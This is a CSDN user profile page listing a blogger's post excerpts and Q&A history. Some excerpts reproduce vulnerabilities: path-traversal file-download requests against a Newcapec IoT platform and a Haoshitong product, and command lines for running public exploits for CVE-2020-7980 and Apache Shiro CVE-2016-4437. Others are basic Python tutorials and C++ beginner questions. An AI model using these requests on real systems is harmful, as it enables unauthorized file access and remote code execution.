忘止于心
码龄8年
关注
提问 私信
  • 博客:3,404
    社区:224
    问答:11,961
    15,589
    总访问量
  • 7
    原创
  • 1,870,650
    排名
  • 2
    粉丝
  • 0
    铁粉
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:安徽省
  • 加入CSDN时间: 2016-10-29
博客简介:

忘止于心的博客

查看详细资料
个人成就
  • 获得2次点赞
  • 内容获得1次评论
  • 获得0次收藏
创作历程
  • 7篇
    2020年
成就勋章
TA的专栏
  • 漏洞复现
    4篇
  • python
    3篇
兴趣领域 设置
  • 网络空间安全
    web安全
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

2020-12-22

新开普电子股份有限公司_任意文件下载物联网平台GET /api/device/foreignId//…%255c…%255c…%255c…%255c…%255c…%255c…%255c…%255cwindows/win.ini HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Encoding: gzip,deflateHost: 127.0.0.1:8080User-Agen
原创
发布博客 2020.12.22 ·
987 阅读 ·
1 点赞 ·
1 评论 ·
0 收藏

2020-12-22

深圳银澎云计算有限公司任意文件下载好视通GET /register/toDownload.do?fileName=…/WEB-INF/web.xml HTTP/1.1Referer: http://127.0.0.1:8086/Cookie: JSESSIONID=49053781E7D31521EBD73EBE85A031C2;mldn-session-id=8c35b1b1-2ab3-45a0-b86a-f107b2b02fcbAccept: textml,application/xhtml
原创
发布博客 2020.12.22 ·
255 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

CVE-2020-7980

影响版本Intellian v1.12, v1.21, v1.24.```pythonpocCVE-2020-7980 https://github.com/Xh4H/Satellian-CVE-2020-7980python satellian.py -u http://xxx.com
原创
发布博客 2020.07.29 ·
749 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。1.搭建好环境2.复现http://目标IP:8080python shiro_exploit.py -u http://ip:80
原创
发布博客 2020.07.14 ·
947 阅读 ·
1 点赞 ·
1 评论 ·
0 收藏

django安装, 创建第一个项目

Django 下载地址:https://www.djangoproject.com/download/或者pip命令或者pip命令pip install Django安装指定版本pip install Django=2.1django-admin startproject democd demopython3 manage.py runserver 0.0.0.0:8000...
原创
发布博客 2020.04.17 ·
112 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Python3 Requests 模块

Python3 Requests 模块首先安装 requestspip install requests发送get请求 设置超时时间 timeout 单位秒import requestsurl r = r"https://www.baidu.com/"headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x6...
原创
发布博客 2020.04.14 ·
221 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

python

pythonPython ssh 连接安装库 paramiko linux pip3 install paramiko win pip install paramikoimport paramiko #创建一个ssh的客户端,用来连接服务器ssh = paramiko.SSHClient()#创建一个ssh的白名单know...
原创
发布博客 2020.04.14 ·
134 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

一个c++的小问题 fin >> num; fin.get(); 上面2句是什么意思

发布问题 2017.02.06 ·
1 回答

C++编写延时循环有大神帮我一下吗?万分感谢!!!!

发布问题 2016.12.31 ·
2 回答

大神们 C++中逗号运算符

发布问题 2016.12.29 ·
4 回答

关于C++中逗号运算符 为什么运行不起来呀 还出现很多的错误

答:

for (j = 0; i = word.size() - 1; j < i; --i, ++j)
中j<i;中发号有错误

回答问题 2016.12.29

关于C++中逗号运算符 为什么运行不起来呀 还出现很多的错误

发布问题 2016.12.29 ·
6 回答

关于C++中逗号运算符 为什么运行不起来呀 还出现很多的错误

答:

#include "stdafx.h"
#include
#include

int _tmain(int argc, _TCHAR* argv[])
{
using namespace std;
cout << "输入一个词: ";
string word;
cin >> word;
char temp;
int i, j;
for (j = 0; i = word.size() - 1; j < i; --i, ++j)
{//start block启动块
temp = word[i];
word[i] = word[j];
word[j] = temp;
}
cout << word << "\nDone\n";
return 0;
}

回答问题 2016.12.29

QT文件读取,comtrade文件怎么定义结构体读取,求教

答:

抱歉 我不知道哈哈

回答问题 2016.12.27